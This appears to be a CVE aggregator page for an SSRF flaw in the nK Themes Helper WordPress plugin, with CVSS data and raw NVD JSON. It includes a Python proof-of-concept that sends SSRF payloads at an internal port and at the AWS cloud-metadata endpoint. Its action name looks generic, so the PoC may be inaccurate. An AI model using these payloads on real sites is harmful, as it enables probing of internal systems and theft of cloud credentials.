Security Vulnerability Report
中文
CVE-2025-22726 CVSS 6.4 MEDIUM

CVE-2025-22726

Published: 2026-01-08 10:15:48
Last Modified: 2026-04-27 19:16:12

Description

Server-Side Request Forgery (SSRF) vulnerability in _nK nK Themes Helper nk-themes-helper allows Server Side Request Forgery.This issue affects nK Themes Helper: from n/a through <= 1.7.9.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

nK Themes Helper <= 1.7.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-22726 SSRF PoC # Target: WordPress site with nK Themes Helper plugin <= 1.7.9 target_url = "http://target-site.com/wp-admin/admin-ajax.php" # SSRF payload - scan internal port ssrf_payload = { "action": "nk_theme_helper_action", "url": "http://127.0.0.1:8080/internal-api", "dataType": "json" } # Alternative: AWS metadata exploit metadata_payload = { "action": "nk_theme_helper_action", "url": "http://169.254.169.254/latest/meta-data/", "dataType": "json" } print("Sending SSRF payload to target...") response = requests.post(target_url, data=ssrf_payload) print(f"Status: {response.status_code}") print(f"Response: {response.text[:500]}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-22726", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:48.247", "lastModified": "2026-04-27T19:16:12.380", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in _nK nK Themes Helper nk-themes-helper allows Server Side Request Forgery.This issue affects nK Themes Helper: from n/a through <= 1.7.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/nk-themes-helper/vulnerability/wordpress-nk-themes-helper-plugin-1-7-9-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}